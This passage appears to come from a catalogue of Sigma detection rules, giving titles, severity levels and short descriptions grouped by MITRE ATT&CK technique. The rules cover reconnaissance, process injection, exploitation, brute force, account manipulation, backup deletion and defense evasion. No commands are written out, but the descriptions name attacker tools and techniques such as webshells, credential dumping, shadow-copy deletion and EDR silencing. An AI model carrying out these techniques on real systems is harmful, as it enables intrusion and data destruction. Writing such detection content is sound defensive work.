    Description: Detects usage of the Get-ADComputer cmdlet to collect computer information and output it to a file
  • Suspicious PowerShell Get Current User - Level: low
    Description: Detects the use of PowerShell to identify the current logged user.
  • User Discovery And Export Via Get-ADUser Cmdlet - PowerShell - Level: medium
    Description: Detects usage of the Get-ADUser cmdlet to collect user information and output it to a file
  • HackTool - SharpLdapWhoami Execution - Level: high
    Description: Detects SharpLdapWhoami, a whoami alternative that queries the LDAP service on a domain controller
  • HackTool - SharpView Execution - Level: high
    Description: Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems
  • Computer Discovery And Export Via Get-ADComputer Cmdlet - Level: medium
    Description: Detects usage of the Get-ADComputer cmdlet to collect computer information and output it to a file
  • User Discovery And Export Via Get-ADUser Cmdlet - Level: medium
    Description: Detects usage of the Get-ADUser cmdlet to collect user information and output it to a file
  • Renamed Whoami Execution - Level: critical
    Description: Detects the execution of whoami that has been renamed to a different name to avoid detection
  • Local Accounts Discovery - Level: low
    Description: Local accounts, System Owner/User discovery using operating systems utilities
  • WhoAmI as Parameter - Level: high
    Description: Detects a suspicious process command line that uses whoami as first parameter (as e.g. used by EfsPotato)
  • Chopper Webshell Process Pattern - Level: high
    Description: Detects patterns found in process executions caused by China Chopper-like tiny (ASPX) webshells
  • Webshell Hacking Activity Patterns - Level: high
    Description: Detects certain parent child patterns found in cases in which a web shell is used to perform certain credential dumping or exfiltration activities on a compromised system
  • Webshell Detection With Command Line Keywords - Level: high
    Description: Detects certain command line parameters often used during reconnaissance activity via web shells
  • Enumerate All Information With Whoami.EXE - Level: medium
    Description: Detects the execution of "whoami.exe" with the "/all" flag
  • Whoami Utility Execution - Level: low
    Description: Detects the execution of whoami, which is often used by attackers after exploitation / privilege escalation
  • Whoami.EXE Execution From Privileged Process - Level: high
    Description: Detects the execution of "whoami.exe" by privileged accounts that are often abused by threat actors
  • Group Membership Reconnaissance Via Whoami.EXE - Level: medium
    Description: Detects the execution of whoami.exe with the /group command line flag to show group membership for the current user, account type, security identifiers (SID), and attributes.
  • Whoami.EXE Execution With Output Option - Level: medium
    Description: Detects the execution of "whoami.exe" with the "/FO" flag to choose CSV as output format or with redirection options to export the results to a file for later use.
  • Whoami.EXE Execution Anomaly - Level: medium
    Description: Detects the execution of whoami.exe with suspicious parent processes.
  • Security Privileges Enumeration Via Whoami.EXE - Level: high
    Description: Detects a whoami.exe executed with the /priv command line flag instructing the tool to show all current user privileges. This is often used after a privilege escalation attempt.
  • Potential Dridex Activity - Level: critical
    Description: Detects potential Dridex activity via specific process patterns
  • Silence.Downloader V3 - Level: high
    Description: Detects Silence downloader. These commands are hardcoded into the binary.
attack.t1082 33
  • Bitbucket User Details Export Attempt Detected - Level: medium
    Description: Detects user data export activity.
  • Bitbucket User Permissions Export Attempt - Level: medium
    Description: Detects user permission data export attempt.
  • System Information Discovery - Auditd - Level: low
    Description: Detects System Information Discovery commands
  • System and Hardware Information Discovery - Level: informational
    Description: Detects system information discovery commands
  • OS Architecture Discovery Via Grep - Level: low
    Description: Detects the use of grep to identify information about the operating system architecture. Often combined beforehand with the execution of "uname" or "cat /proc/cpuinfo"
  • Potential GobRAT File Discovery Via Grep - Level: high
    Description: Detects the use of grep to discover specific files created by the GobRAT malware
  • Container Residence Discovery Via Proc Virtual FS - Level: low
    Description: Detects potential container discovery via listing of certain kernel features in the "/proc" virtual filesystem
  • Docker Container Discovery Via Dockerenv Listing - Level: low
    Description: Detects listing or file reading of ".dockerenv" which can be a sign of potential container discovery
  • Potential Container Discovery Via Inodes Listing - Level: low
    Description: Detects listing of the inodes of the "/" directory to determine if we are running inside of a container.
  • System Information Discovery - Level: informational
    Description: Detects system information discovery commands
  • System Information Discovery Using Ioreg - Level: medium
    Description: Detects the use of "ioreg" which will show I/O Kit registry information. This process is used for system information discovery. It has been observed in-the-wild by calling this process directly or using bash and grep to look for specific strings.
  • System Information Discovery Using sw_vers - Level: medium
    Description: Detects the use of "sw_vers" for system information discovery
  • System Information Discovery Via Sysctl - MacOS - Level: medium
    Description: Detects the execution of "sysctl" with specific arguments that have been used by threat actors and malware. It provides system hardware information. This process is primarily used to detect and avoid virtualization and analysis environments.
  • System Information Discovery Using System_Profiler - Level: medium
    Description: Detects the execution of "system_profiler" with specific "Data Types" that have been seen being used by threat actors and malware. It provides system hardware and software configuration information. This process is primarily used for system information discovery. However, "system_profiler" can also be used to determine if virtualization software is being run for defense evasion purposes.
  • Cisco Discovery - Level: low
    Description: Find information about network devices that is not stored in config files
  • HackTool - WinPwn Execution - ScriptBlock - Level: high
    Description: Detects scriptblock text keywords indicative of potential usage of the tool WinPwn, a tool for Windows and Active Directory reconnaissance and exploitation.
  • Suspicious Kernel Dump Using Dtrace - Level: high
    Description: Detects suspicious way to dump the kernel on Windows systems using dtrace.exe, which is available on Windows systems since Windows 10 19H1
  • HackTool - PCHunter Execution - Level: high
    Description: Detects suspicious use of PCHunter, a tool like Process Hacker to view and manipulate processes, kernel options and other low level stuff
  • HackTool - winPEAS Execution - Level: high
    Description: WinPEAS is a script that searches for possible paths to escalate privileges on Windows hosts. The checks are explained on book.hacktricks.xyz
  • HackTool - WinPwn Execution - Level: high
    Description: Detects commandline keywords indicative of potential usage of the tool WinPwn, a tool for Windows and Active Directory reconnaissance and exploitation.
  • Suspicious Execution of Hostname - Level: low
    Description: Use of hostname to get information
  • Network Reconnaissance Activity - Level: high
    Description: Detects a set of suspicious network related commands often used in recon stages
  • PUA - System Informer Execution - Level: medium
    Description: Detects the execution of System Informer, a task manager tool to view and manipulate processes, kernel options and other low level operations
  • Suspicious Query of MachineGUID - Level: low
    Description: Use of reg to get MachineGuid information
  • Potential Suspicious Activity Using SeCEdit - Level: medium
    Description: Detects potential suspicious behaviour using secedit.exe, such as exporting or modifying the security policy
  • Suspicious Execution of Systeminfo - Level: low
    Description: Detects usage of the "systeminfo" command to retrieve information
  • Uncommon System Information Discovery Via Wmic.EXE - Level: medium
    Description: Detects the use of the WMI command-line (WMIC) utility to identify and display various system information, including OS, CPU, GPU, and disk drive names; memory capacity; display resolution; and baseboard, BIOS, and GPU driver products/versions. Some of these commands were used by Aurora Stealer in late 2022/early 2023.
  • System Disk And Volume Reconnaissance Via Wmic.EXE - Level: medium
    Description: An adversary might use WMI to discover information about the system, such as the volume name, size, free space, and other disk information. This can be done using the `wmic` command-line utility and has been observed being used by threat actors such as Volt Typhoon.
  • CMD Shell Output Redirect - Level: low
    Description: Detects the use of the redirection character ">" to redirect information on the command line. This technique is sometimes used by malicious actors in order to redirect the output of reconnaissance commands such as "hostname" and "dir" to files for future exfiltration.
  • System Information Discovery Via Wmic.EXE - Level: low
    Description: Detects the use of the WMI command-line (WMIC) utility to identify and display various system information, including OS, CPU, GPU, disk drive names, memory capacity, display resolution, baseboard, BIOS, and GPU driver products/versions.
  • Silence.Downloader V3 - Level: high
    Description: Detects Silence downloader. These commands are hardcoded into the binary.
  • Reconnaissance Activity Using BuiltIn Commands - Level: medium
    Description: Detects execution of a set of builtin commands often used in recon stages by different attack groups
  • Domain User Enumeration Network Recon 01 - Level: medium
    Description: Domain user and group enumeration via network reconnaissance. Seen in APT 29 and other common tactics and actors. Detects a set of RPC (remote procedure calls) used to enumerate a domain controller. The rule was created based off the datasets and hackathon from https://github.com/OTRF/detection-hackathon-apt29
attack.t1055 31
  • Rare Remote Thread Creation By Uncommon Source Image - Level: high
    Description: Detects uncommon processes creating remote threads.
  • Remote Thread Created In Shell Application - Level: medium
    Description: Detects remote thread creation in command shell applications, such as "Cmd.EXE" and "PowerShell.EXE". It is a common technique used by malware, such as IcedID, to inject malicious code and execute it within legitimate processes.
  • Remote Thread Creation By Uncommon Source Image - Level: medium
    Description: Detects uncommon processes creating remote threads.
  • Created Files by Microsoft Sync Center - Level: medium
    Description: This rule detects suspicious files created by Microsoft Sync Center (mobsync)
  • Potential DLL Sideloading Using Coregen.exe - Level: medium
    Description: Detects usage of the "coregen.exe" (Microsoft CoreCLR Native Image Generator) binary to sideload arbitrary DLLs.
  • DotNet CLR DLL Loaded By Scripting Applications - Level: high
    Description: Detects .NET CLR DLLs being loaded by scripting applications such as wscript or cscript. This could be an indication of potential suspicious execution.
  • Network Connection Initiated Via Notepad.EXE - Level: high
    Description: Detects a network connection that is initiated by the "notepad.exe" process. This might be a sign of process injection from a beacon process or something similar. Notepad rarely initiates a network communication except when printing documents for example.
  • Microsoft Sync Center Suspicious Network Connections - Level: medium
    Description: Detects suspicious connections from Microsoft Sync Center to non-private IPs.
  • CobaltStrike Named Pipe - Level: critical
    Description: Detects the creation of a named pipe as used by CobaltStrike
  • CobaltStrike Named Pipe Pattern Regex - Level: critical
    Description: Detects the creation of a named pipe matching a pattern used by CobaltStrike Malleable C2 profiles
  • CobaltStrike Named Pipe Patterns - Level: high
    Description: Detects the creation of a named pipe with a pattern found in CobaltStrike malleable C2 profiles
  • HackTool - CoercedPotato Named Pipe Creation - Level: high
    Description: Detects the pattern of a pipe name as used by the hack tool CoercedPotato
  • HackTool - EfsPotato Named Pipe Creation - Level: high
    Description: Detects the pattern of a pipe name as used by the hack tool EfsPotato
  • Malicious Named Pipe Created - Level: critical
    Description: Detects the creation of a named pipe seen used by known APTs or malware.
  • PowerShell ShellCode - Level: high
    Description: Detects Base64 encoded Shellcode
  • Dllhost.EXE Execution Anomaly - Level: high
    Description: Detects a "dllhost" process spawning with no commandline arguments which is very rare to happen and could indicate process injection activity or malware mimicking similar system processes.
  • HackTool - CoercedPotato Execution - Level: high
    Description: Detects the use of CoercedPotato, a tool for privilege escalation
  • HackTool - DInjector PowerShell Cradle Execution - Level: critical
    Description: Detects the use of the Dinject PowerShell cradle based on the specific flags
  • Potential Process Injection Via Msra.EXE - Level: high
    Description: Detects potential process injection via Microsoft Remote Assistance (Msra.exe) by looking at suspicious child processes spawned from the aforementioned process. It has been a target used by many threat actors and used for discovery and persistence tactics
  • Suspicious Rundll32 Invoking Inline VBScript - Level: high
    Description: Detects suspicious process related to rundll32 based on command line that invokes inline VBScript as seen being used by UNC2452
  • Process Creation Using Sysnative Folder - Level: medium
    Description: Detects process creation events that use the Sysnative folder (common for CobaltStrike spawns)
  • Suspicious Userinit Child Process - Level: medium
    Description: Detects a suspicious child process of userinit
  • Suspect Svchost Activity - Level: high
    Description: It is extremely abnormal for svchost.exe to spawn without any CLI arguments and is normally observed when a malicious process spawns the process and injects code into the process memory space.
  • Suspicious Child Process Of Wermgr.EXE - Level: high
    Description: Detects suspicious Windows Error Reporting manager (wermgr.exe) child process
  • Malware Shellcode in Verclsid Target Process - Level: high
    Description: Detects a process access to verclsid.exe that injects shellcode from a Microsoft Office application / VBA macro
  • Potential Dridex Activity - Level: critical
    Description: Detects potential Dridex activity via specific process patterns
  • Antivirus PrinterNightmare CVE-2021-34527 Exploit Detection - Level: critical
    Description: Detects the suspicious file that is created from PoC code against Windows Print Spooler Remote Code Execution Vulnerability CVE-2021-34527 (PrinterNightmare), CVE-2021-1675.
  • APT PRIVATELOG Image Load Pattern - Level: high
    Description: Detects an image load pattern as seen when a tool named PRIVATELOG is used and rarely observed under legitimate circumstances
  • Injected Browser Process Spawning Rundll32 - GuLoader Activity - Level: high
    Description: Detects the execution of installed GuLoader malware on the host. GuLoader is initiating network connections via the rundll32.exe process that is spawned via a browser parent (injected) process.
  • Lummac Stealer Activity - Execution Of More.com And Vbc.exe - Level: high
    Description: Detects the execution of more.com and vbc.exe in the process tree. This behavior was observed by a set of samples related to Lummac Stealer. The Lummac payload is injected into the vbc.exe process.
  • Potential Shellcode Injection - Level: medium
    Description: Detects potential shellcode injection as seen used by tools such as Metasploit's migrate and Empire's psinject.
attack.t1203 29
  • OMIGOD SCX RunAsProvider ExecuteShellCommand - Auditd - Level: high
    Description: Rule to detect the use of the SCX RunAsProvider Invoke_ExecuteShellCommand to execute any UNIX/Linux command using the /bin/sh shell. SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including Microsoft Operations Manager, Microsoft Azure, and Microsoft Operations Management Suite.
  • iOS Implant URL Pattern - Level: critical
    Description: Detects URL pattern used by iOS Implant
  • Antivirus Exploitation Framework Detection - Level: critical
    Description: Detects a highly relevant Antivirus alert that reports an exploitation framework. This event must not be ignored just because the AV has blocked the malware but investigate, how it came there in the first place.
  • OMIGOD SCX RunAsProvider ExecuteScript - Level: high
    Description: Rule to detect the use of the SCX RunAsProvider ExecuteScript to execute any UNIX/Linux script using the /bin/sh shell. Script being executed gets created as a temp file in /tmp folder with a scx* prefix. Then it is invoked from the following directory /etc/opt/microsoft/scx/conf/tmpdir/. The file in that directory has the same prefix scx*. SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including Microsoft Operations Manager, Microsoft Azure, and Microsoft Operations Management Suite.
  • OMIGOD SCX RunAsProvider ExecuteShellCommand - Level: high
    Description: Rule to detect the use of the SCX RunAsProvider Invoke_ExecuteShellCommand to execute any UNIX/Linux command using the /bin/sh shell. SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including Microsoft Operations Manager, Microsoft Azure, and Microsoft Operations Management Suite.
  • Suspicious Invocation of Shell via Rsync - Level: high
    Description: Detects the execution of a shell as sub process of "rsync" without the expected command line flag "-e" being used, which could be an indication of exploitation as described in CVE-2024-12084. This behavior is commonly associated with attempts to execute arbitrary commands or escalate privileges, potentially leading to unauthorized access or further exploitation.
  • Suspicious Browser Child Process - MacOS - Level: medium
    Description: Detects suspicious child processes spawned from browsers. This could be a result of a potential web browser exploitation.
  • OMIGOD HTTP No Authentication RCE - Level: high
    Description: Detects the exploitation of OMIGOD (CVE-2021-38647) which allows remote command execution (RCE) as root with just a single unauthenticated HTTP request. Verify successful exploitation by viewing the HTTP client (request) body to see what was passed to the server (using PCAP). Within the client body is where the code execution would occur. Additionally, check the endpoint logs to see if suspicious commands or activity occurred within the timeframe of this HTTP request.
  • Download From Suspicious TLD - Blacklist - Level: low
    Description: Detects download of certain file types from hosts in suspicious TLDs
  • Download From Suspicious TLD - Whitelist - Level: low
    Description: Detects executable downloads from suspicious remote systems
  • Audit CVE Event - Level: critical
    Description: Detects events generated by user-mode applications when they call the CveEventWrite API when a known vulnerability is trying to be exploited. MS started using this log in Jan. 2020 with CVE-2020-0601 (a Windows CryptoAPI vulnerability). Unfortunately, that is about the only instance of CVEs being written to this log.
  • Network Connection Initiated By Eqnedt32.EXE - Level: high
    Description: Detects network connections from the Equation Editor process "eqnedt32.exe".
  • Office Application Initiated Network Connection To Non-Local IP - Level: medium
    Description: Detects an office application (Word, Excel, PowerPoint) that initiates a network connection to a non-private IP address. This rule aims to detect traffic similar to one seen exploited in CVE-2021-42292. This rule will require an initial baseline and tuning that is specific to your organization.
  • Suspicious HWP Sub Processes - Level: high
    Description: Detects suspicious Hangul Word Processor (Hanword) sub processes that could indicate an exploitation
  • Java Running with Remote Debugging - Level: medium
    Description: Detects a JAVA process running with remote debugging allowing more than just localhost to connect
  • Potentially Suspicious Child Process of KeyScrambler.exe - Level: medium
    Description: Detects potentially suspicious child processes of KeyScrambler.exe
  • Suspicious Spool Service Child Process - Level: high
    Description: Detects suspicious print spool service (spoolsv.exe) child processes.
  • Potentially Suspicious Child Process Of WinRAR.EXE - Level: medium
    Description: Detects potentially suspicious child processes of WinRAR.exe.
  • Exploit for CVE-2017-0261 - Level: medium
    Description: Detects Winword starting uncommon sub process FLTLDR.exe as used in exploits for CVE-2017-0261 and CVE-2017-0262
  • Droppers Exploiting CVE-2017-11882 - Level: critical
    Description: Detects exploits that use CVE-2017-11882 to start EQNEDT32.EXE and other sub processes like mshta.exe
  • Exploit for CVE-2017-8759 - Level: critical
    Description: Detects Winword starting uncommon sub process csc.exe as used in exploits for CVE-2017-8759
  • CVE-2021-31979 CVE-2021-33771 Exploits by Sourgum - Level: critical
    Description: Detects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum
  • CVE-2021-31979 CVE-2021-33771 Exploits - Level: critical
    Description: Detects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum
  • Potential CVE-2021-26857 Exploitation Attempt - Level: high
    Description: Detects possible successful exploitation for vulnerability described in CVE-2021-26857 by looking for abnormal subprocesses spawning by Exchange Server's Unified Messaging service
  • CVE-2021-26858 Exchange Exploitation - Level: high
    Description: Detects possible successful exploitation for vulnerability described in CVE-2021-26858 by looking for creation of non-standard files on disk by Exchange Server’s Unified Messaging service which could indicate dropping web shells or other malicious content
  • CVE-2023-38331 Exploitation Attempt - Suspicious WinRAR Child Process - Level: high
    Description: Detects exploitation attempt of CVE-2023-38331 (WinRAR before v6.23), where an attacker can leverage WinRAR to execute arbitrary commands and binaries.
  • Dfsvc.EXE Network Connection To Non-Local IPs - Level: medium
    Description: Detects network connections from "dfsvc.exe", used to handle ClickOnce applications, to non-local IPs
  • Dfsvc.EXE Initiated Network Connection Over Uncommon Port - Level: high
    Description: Detects an initiated network connection over uncommon ports from "dfsvc.exe", a utility used to handle ClickOnce applications.
  • OMIGOD SCX RunAsProvider ExecuteScript - Level: high
    Description: Rule to detect the use of the SCX RunAsProvider ExecuteScript to execute any UNIX/Linux script using the /bin/sh shell. Script being executed gets created as a temp file in /tmp folder with a scx* prefix. Then it is invoked from the following directory /etc/opt/microsoft/scx/conf/tmpdir/. The file in that directory has the same prefix scx*. SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including Microsoft Operations Manager, Microsoft Azure, and Microsoft Operations Management Suite.
attack.t1110 28
  • Brute Force - Level: medium
    Description: Detects many authentication failures from one source to one destination which may indicate Brute Force activity
  • CrackMapExecWin - Level: critical
    Description: Detects CrackMapExecWin Activity as Described by NCSC
  • Password Spray Activity - Level: high
    Description: Indicates that a password spray attack has been successfully performed.
  • Account Lockout - Level: medium
    Description: Identifies a user account which has been locked because the user tried to sign in too many times with an incorrect user ID or password.
  • Successful Authentications From Countries You Do Not Operate Out Of - Level: medium
    Description: Detect successful authentications from countries you do not operate out of.
  • Failed Authentications From Countries You Do Not Operate Out Of - Level: low
    Description: Detect failed authentications from countries you do not operate out of.
  • Potential MFA Bypass Using Legacy Client Authentication - Level: high
    Description: Detects successful authentication from potential clients using legacy authentication via user agent strings. This could be a sign of MFA bypass using a password spray attack.
  • Sign-in Failure Due to Conditional Access Requirements Not Met - Level: high
    Description: Define a baseline threshold for failed sign-ins due to Conditional Access failures
  • Use of Legacy Authentication Protocols - Level: high
    Description: Alerts when legacy authentication has been used on an account
  • Multifactor Authentication Denied - Level: medium
    Description: User has indicated they haven't instigated the MFA prompt, which could indicate an attacker has the password for the account.
  • Multifactor Authentication Interrupted - Level: medium
    Description: Identifies user login with multifactor authentication failures, which might be an indication an attacker has the password for the account but can't pass the MFA challenge.
  • User Access Blocked by Azure Conditional Access - Level: medium
    Description: Detects access that has been blocked by Conditional Access policies. The access policy does not allow token issuance, which might be a sign of unauthorized login to valid accounts.
  • Bitbucket User Login Failure - Level: medium
    Description: Detects user authentication failure events. Please note that this rule can be noisy and it is recommended to use with correlation based on "author.name" field.
  • Bitbucket User Login Failure Via SSH - Level: medium
    Description: Detects SSH user login access failures. Please note that this rule can be noisy and it is recommended to use with correlation based on "author.name" field.
  • Cisco BGP Authentication Failures - Level: low
    Description: Detects BGP failures which may be indicative of brute force attacks to manipulate routing
  • Cisco LDP Authentication Failures - Level: low
    Description: Detects LDP failures which may be indicative of brute force attacks to manipulate MPLS labels
  • Huawei BGP Authentication Failures - Level: low
    Description: Detects BGP failures which may be indicative of brute force attacks to manipulate routing.
  • Juniper BGP Missing MD5 - Level: low
    Description: Detects Juniper BGP missing MD5 digest, which may be indicative of brute force attacks to manipulate routing.
  • Hack Tool User Agent - Level: high
    Description: Detects suspicious user agent strings used by hack tools in proxy logs
  • MSSQL Server Failed Logon - Level: low
    Description: Detects failed logon attempts from clients to MSSQL server.
  • MSSQL Server Failed Logon From External Network - Level: medium
    Description: Detects failed logon attempts from clients with external network IP to an MSSQL server. This can be a sign of a bruteforce attack.
  • NTLM Brute Force - Level: medium
    Description: Detects common NTLM brute force device names
  • External Remote RDP Logon from Public IP - Level: medium
    Description: Detects successful logon from public IP address via RDP. This can indicate a publicly-exposed RDP port.
  • External Remote SMB Logon from Public IP - Level: high
    Description: Detects successful logon from public IP address via SMB. This can indicate a publicly-exposed SMB port.
  • HackTool - CrackMapExec Execution - Level: high
    Description: This rule detects common flag combinations used by CrackMapExec in order to detect its use even if the binary has been replaced.
  • HackTool - Hydra Password Bruteforce Execution - Level: high
    Description: Detects command line parameters used by Hydra password guessing hack tool
  • Sign-in Failure Bad Password Threshold - Level: high
    Description: Define a baseline threshold and then monitor and adjust to suit your organizational behaviors and limit false alerts from being generated.
  • Failed Logins with Different Accounts from Single Source - Linux - Level: medium
    Description: Detects suspicious failed logins with different user accounts from a single source system
attack.t1098 27
  • AWS IAM Backdoor Users Keys - Level: medium
    Description: Detects AWS API key creation for a user by another user. Backdoored users can be used to obtain persistence in the AWS environment. Also with this alert, you can detect a flow of AWS keys in your org.
  • AWS Route 53 Domain Transfer Lock Disabled - Level: low
    Description: Detects when a transfer lock was removed from a Route 53 domain. It is recommended to refrain from performing this action unless intending to transfer the domain to a different registrar.
  • AWS Route 53 Domain Transferred to Another Account - Level: low
    Description: Detects when a request has been made to transfer a Route 53 domain to another AWS account.
  • AWS User Login Profile Was Modified - Level: high
    Description: Detects activity when someone is changing passwords on behalf of other users. An attacker with the "iam:UpdateLoginProfile" permission on other users can change the password used to login to the AWS console on any user that already has a login profile setup.
  • Number Of Resource Creation Or Deployment Activities - Level: medium
    Description: Number of VM creations or deployment activities occur in Azure via the azureactivity log.
  • Change to Authentication Method - Level: medium
    Description: Change to authentication method could be an indicator of an attacker adding an auth method to the account so they can have continued access.
  • Bulk Deletion Changes To Privileged Account Permissions - Level: high
    Description: Detects when a user is removed from a privileged role. Bulk changes should be investigated.
  • Anomalous User Activity - Level: high
    Description: Indicates that there are anomalous patterns of behavior like suspicious changes to the directory.
  • Bitbucket Global Permission Changed - Level: medium
    Description: Detects global permissions change activity.
  • GCP Access Policy Deleted - Level: medium
    Description: Detects when an access policy that is applied to a GCP cloud resource is deleted. An adversary would be able to remove access policies to gain access to a GCP cloud resource.
  • Google Workspace Granted Domain API Access - Level: medium
    Description: Detects when an API access service account is granted domain authority.
  • Google Workspace User Granted Admin Privileges - Level: medium
    Description: Detects when a Google Workspace user is granted admin privileges.
  • Privileged User Has Been Created - Level: high
    Description: Detects the addition of a new user to a privileged group such as "root" or "sudo"
  • Cisco Local Accounts - Level: high
    Description: Find local accounts being created or modified as well as remote authentication configurations
  • Powerview Add-DomainObjectAcl DCSync AD Extend Right - Level: high
    Description: Backdooring a domain object to grant the rights associated with DCSync to a regular user or machine account using the Powerview\Add-DomainObjectAcl DCSync Extended Right cmdlet allows re-obtaining the password hashes of any user/computer
  • Enabled User Right in AD to Control User Objects - Level: high
    Description: Detects a user being assigned the SeEnableDelegationPrivilege right in Active Directory, which allows control of other AD user objects.
  • Active Directory User Backdoors - Level: high
    Description: Detects scenarios where one can control another user's or computer's account without having to use their credentials.
  • A New Trust Was Created To A Domain - Level: medium
    Description: Detects the creation of a new domain trust. Adding a trusted domain is rare and should be verified for legitimacy.
  • Password Change on Directory Service Restore Mode (DSRM) Account - Level: high
    Description: Detects potential attempts made to set the Directory Services Restore Mode administrator password. The Directory Service Restore Mode (DSRM) account is a local administrator account on Domain Controllers. Attackers may change the password in order to obtain persistence.
  • User Added to Local Administrator Group - Level: medium
    Description: Detects the addition of a new member to the local administrator group, which could be legitimate activity or a sign of privilege escalation activity
  • A Member Was Removed From a Security-Enabled Global Group - Level: low
    Description: Detects activity when a member is removed from a security-enabled global group
  • A Member Was Added to a Security-Enabled Global Group - Level: low
    Description: Detects activity when a member is added to a security-enabled global group
  • A Security-Enabled Global Group Was Deleted - Level: low
    Description: Detects activity when a security-enabled global group is deleted
  • Powershell LocalAccount Manipulation - Level: medium
    Description: Adversaries may manipulate accounts to maintain access to victim systems. Account manipulation may consist of any action that preserves adversary access to a compromised account, such as modifying credentials or permission groups
  • User Added to Local Administrators Group - Level: medium
    Description: Detects addition of users to the local administrator group via "Net" or "Add-LocalGroupMember".
  • User Added To Highly Privileged Group - Level: high
    Description: Detects addition of users to highly privileged groups via "Net" or "Add-LocalGroupMember".
  • Suspicious Computer Account Name Change CVE-2021-42287 - Level: high
    Description: Detects the renaming of an existing computer account to an account name that doesn't contain a $ symbol, as seen in attacks against CVE-2021-42287
attack.t1490 26
  • AWS S3 Bucket Versioning Disable - Level: medium
    Description: Detects when S3 bucket versioning is disabled. Threat actors use this technique during AWS ransomware incidents prior to deleting S3 objects.
  • Time Machine Backup Deletion Attempt Via Tmutil - MacOS - Level: medium
    Description: Detects deletion attempts of MacOS Time Machine backups via the native backup utility "tmutil". An adversary may perform this action before launching a ransomware attack to prevent the victim from restoring their files.
  • Time Machine Backup Disabled Via Tmutil - MacOS - Level: medium
    Description: Detects disabling of Time Machine (Apple's automated backup utility software) via the native macOS backup utility "tmutil". An attacker can use this to prevent backups from occurring.
  • New File Exclusion Added To Time Machine Via Tmutil - MacOS - Level: medium
    Description: Detects the addition of a new file or path exclusion to MacOS Time Machine via the "tmutil" utility. An adversary could exclude a path from Time Machine backups to prevent certain files from being backed up.
  • Cisco Modify Configuration - Level: medium
    Description: Detects modifications to a configuration that would serve an adversary's impact or persistence goals
  • Backup Files Deleted - Level: medium
    Description: Detects deletion of files with extensions often used for backup files. Adversaries may delete or remove built-in operating system data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.
  • Suspicious Volume Shadow Copy Vssapi.dll Load - Level: high
    Description: Detects the image load of the VSS DLL vssapi.dll by uncommon executables
  • Potentially Suspicious Volume Shadow Copy Vsstrace.dll Load - Level: medium
    Description: Detects the image load of the VSS DLL vsstrace.dll by uncommon executables
  • Suspicious Volume Shadow Copy VSS_PS.dll Load - Level: high
    Description: Detects the image load of vss_ps.dll by uncommon executables
  • Delete Volume Shadow Copies Via WMI With PowerShell - Level: high
    Description: Detects shadow copy deletion using operating system utilities via PowerShell
  • Delete Volume Shadow Copies via WMI with PowerShell - PS Script - Level: high
    Description: Detects deletion of Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil
  • Deletion of Volume Shadow Copies via WMI with PowerShell - PS Script - Level: high
    Description: Detects deletion of Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil
  • Boot Configuration Tampering Via Bcdedit.EXE - Level: high
    Description: Detects the use of the bcdedit command to tamper with the boot configuration data. This technique is often used by malware or attackers as a destructive step before launching ransomware.
  • Copy From VolumeShadowCopy Via Cmd.EXE - Level: high
    Description: Detects the execution of the builtin "copy" command that targets a shadow copy (sometimes used to copy registry hives that are in use)
  • Deletion of Volume Shadow Copies via WMI with PowerShell - Level: high
    Description: Detects deletion of Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil
  • Sensitive File Access Via Volume Shadow Copy Backup - Level: high
    Description: Detects a command that accesses the VolumeShadowCopy in order to extract sensitive files such as the Security or SAM registry hives or the AD database (ntds.dit)
  • Shadow Copies Deletion Using Operating Systems Utilities - Level: high
    Description: Detects shadow copy deletion using operating system utilities
  • All Backups Deleted Via Wbadmin.EXE - Level: high
    Description: Detects the deletion of all backups or system state backups via "wbadmin.exe". This technique is used by numerous ransomware families and actors. This may only be successful on server platforms that have Windows Backup enabled.
  • Windows Backup Deleted Via Wbadmin.EXE - Level: medium
    Description: Detects the deletion of backups or system state backups via "wbadmin.exe". This technique is used by numerous ransomware families and actors. This may only be successful on server platforms that have Windows Backup enabled.
  • File Recovery From Backup Via Wbadmin.EXE - Level: medium
    Description: Detects the recovery of files from backups via "wbadmin.exe". Attackers can restore sensitive files such as NTDS.DIT or Registry Hives from backups in order to potentially extract credentials.
  • Registry Disable System Restore - Level: high
    Description: Detects the modification of the registry to disable System Restore on the computer
  • New Root or CA or AuthRoot Certificate to Store - Level: medium
    Description: Detects the addition of new root, CA or AuthRoot certificates to the Windows registry
  • WannaCry Ransomware Activity - Level: critical
    Description: Detects WannaCry ransomware activity
  • Potential Dtrack RAT Activity - Level: critical
    Description: Detects potential Dtrack RAT activity via specific process patterns
  • Potential Maze Ransomware Activity - Level: critical
    Description: Detects specific process characteristics of Maze ransomware word document droppers
  • Amsi.DLL Load By Uncommon Process - Level: low
    Description: Detects loading of Amsi.dll by uncommon processes
attack.t1562 23
  • AWS SecurityHub Findings Evasion - Level: high
    Description: Detects the modification of the findings on SecurityHub.
  • Azure Kubernetes Events Deleted - Level: medium
    Description: Detects when Events are deleted in Azure Kubernetes. An adversary may delete events in Azure Kubernetes in an attempt to evade detection.
  • Google Cloud Firewall Modified or Deleted - Level: medium
    Description: Detects when a firewall rule is modified or deleted in Google Cloud Platform (GCP).
  • ETW Logging Disabled In .NET Processes - Registry - Level: high
    Description: Detects potential adversaries stopping ETW providers from recording loaded .NET assemblies.
  • HackTool - EDRSilencer Execution - Filter Added - Level: high
    Description: Detects execution of EDRSilencer, a tool that abuses the Windows Filtering Platform (WFP) to block the outbound traffic of running EDR agents based on specific hardcoded filter names.
  • Windows Filtering Platform Blocked Connection From EDR Agent Binary - Level: high
    Description: Detects a Windows Filtering Platform (WFP) blocked connection event involving common Endpoint Detection and Response (EDR) agents. Adversaries may use WFP filters to prevent Endpoint Detection and Response (EDR) agents from reporting security events.
  • Sysmon Application Crashed - Level: high
    Description: Detects application popup reporting a failure of the Sysmon service
